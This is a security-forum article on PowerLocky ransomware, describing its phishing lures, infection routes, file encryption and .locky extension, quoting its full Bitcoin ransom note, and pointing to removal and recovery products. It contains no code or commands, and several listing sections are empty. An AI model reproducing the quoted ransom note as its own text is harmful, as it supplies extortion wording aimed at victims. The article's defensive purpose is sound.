Remove PowerLocky Ransomware and Restore .locky Encrypted Files - How to, Technology and PC Security Forum |

Remove PowerLocky Ransomware and Restore .locky Encrypted Files

Locky-powerlocky-powerware-ransomware-main-sensorstechofrumRansomware virus, named PowerLocky has been reported to infect users and use encryption to encode the files of infected computers and append the .locky file extension in them. The PowerLocky Ransomware also leaves a ransom note, extorting users to pay the sum of approximately 500$ or 0.74 BTC as a ransom. PowerLocky is reported by researchers to have its name from two powerful ransomware viruses, Locky and PowerWare Ransomware. All users who have become victims of these viruses are advised to take extreme caution and read this article to learn how to remove PowerLocky Ransomware and restore their files.

Threat Summary

Short DescriptionPowerLocky encrypts files with the AES-128 ciphers and asks a ransom payment of 0.7 BTC for decryption.
SymptomsFiles are encrypted and become inaccessible. A ransom note with instructions for paying the ransom shows as a “_HELP_instructions.html” file.
Distribution MethodPowerShell, Spam Emails, Email Attachments, File Sharing Networks.
Detection Tool See If Your System Has Been Affected by PowerLocky


Malware Removal Tool

User ExperienceJoin our forum to Discuss PowerLocky Ransomware.
Data Recovery ToolWindows Data Recovery by Stellar Phoenix Notice! This product scans your drive sectors to recover lost files and it may not recover 100% of the encrypted files, but only few of them, depending on the situation and whether or not you have reformatted your drive.

PowerLocky Ransomware – Distribution Methods

To be widespread across user PC’s, PowerLocky ransomware may use various methods to replicate. One of those methods may be via spam e-mail campaigns which may resemble various well-known services or offers, for example:

  • “Windows Free Upgrade Is Here”.
  • “Your PayPal Account Has Been Suspended.”
  • “Your Bank Account Receipt”.
  • “Your Debit Card Has Been Rendered Inactive”.

As soon as an e-mail has been opened by a user, he or she may find either malicious files or malicious URLs, which can cause different activities that can lead to infection of the computer:

  • Malicious redirects to web links that may cause infection via drive-by download.
  • Infection via an Exploit-kit.
  • Infection via malicious macros in infected Microsoft Office or Adobe documents.
  • Infection via a malicious .js(JavaScript) file.

PowerLocky Ransomware – Detailed Information

As soon as PowerLocky has infected a user PC, the ransomware may or may not drop its malicious payload. Since PowerWare Ransomware is a fileless ransomware, if this element is used, it may directly get to the encryption procedure. However, if the virus uses malicious files, it may drop them in the usually targeted file locations:

commonly used file names and folders

Here is a detection of PowerLocky’s main executable by several anti-malware products. It may either be directly activated or simply dropped on the computer:


After the encryption process of PowerLocky Ransomware has been initiated, the ransomware virus begins to scan for and encrypt files. It may scan for files with the following extensions and encrypt them if detects them:


After encrypting the files, the PowerLocky virus appends the .locky file extension to them, for instance:


After encrypting the files, PowerLocky leaves an .html file, named “_HELP_instructions.html”. It has the following ransom instructions for the affected user:

→“We present a special software Locky Decrypter
which allows to decrypt and return control to all your encrypted files.
How to buy Locky decrypter?
1. Download and install Multibit application. This will give you your own Bitcoin-wallet address. You can find it under the “Request” tab. Paste this in the “Your BTC-address” field below._HELP_instructions-html-sensorstechforum
2. Buy Bitcoins, the price is 500 $ / 0.74290893 BTC and send it to your own Bitcoin-wallet address, they will show up in the Multibit app that you installed earlier. From there, hit the “Send” tab. Send the remaining BTC (bitcoin) to this Bitcoin-wallet address: {Unique-BTC-Address}
Now submit the form below, only if you’ve actually sent the Bitcoins. Upon manual verification of the transaction, you will receive the decrypter through email within 12 hours. ALL of your files/data will then be unlocked and decrypted automatically, HTML ransom files will also be removed.
Do NOT remove HTML ransom files or try to temper files in any way, because decrypter will not work anymore.
Please remember this is the only way to ever regain access to your files again!”Source: Infected Users

As visible above there are instructions on how to use the service Multibit to pay ransom money in BitCoin. This is the primary method of payment chosen by cyber-criminal gangs dealing with ransomware since it is untraceable.

PowerLocky Ransomware Virus – Removal and File Restoration

In case you have decided not to pay the ransom money which is highly recommended by security experts, we advise you to follow the step-by-step removal instructions which we have kindly provided below. They are methodologically arranged for maximum effectiveness. In case you fail to discover manually and remove all objects and processes associated with PowerLocky Ransomware, we strongly advise you to try automatic removal solution. It includes the usage of an advanced anti-malware product which will make sure the threat is permanently removed without any harm to the encrypted files and protect your PC in the future as well.

Since files which are encrypted by PowerLocky ransomware most likely have been ciphered with a powerful AES-128 encryption algorithm, it at this point not possible to directly decode them. However, we advise you to wait for an update in this article, which we will provide as soon as a decryptor has been released to the public. In the meantime, we suggest you to attempt the alternative methods in step “3. Restore files encrypted by PowerLocky.”


Ventsislav Krastev

Ventsislav has been covering the latest malware, software and newest tech developments at SensorsTechForum for 3 years now. He started out as a network administrator. Having graduated Marketing as well, Ventsislav also has passion for discovery of new shifts and innovations in cybersecurity that become game changers. After studying Value Chain Management and then Network Administration, he found his passion within cybersecrurity and is a strong believer in basic education of every user towards online safety.

More Posts - Website

Follow Me:

Leave a Comment

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.

Share on Facebook Share
Share on Twitter Tweet
Share on Google Plus Share
Share on Linkedin Share
Share on Digg Share
Share on Reddit Share
Share on Stumbleupon Share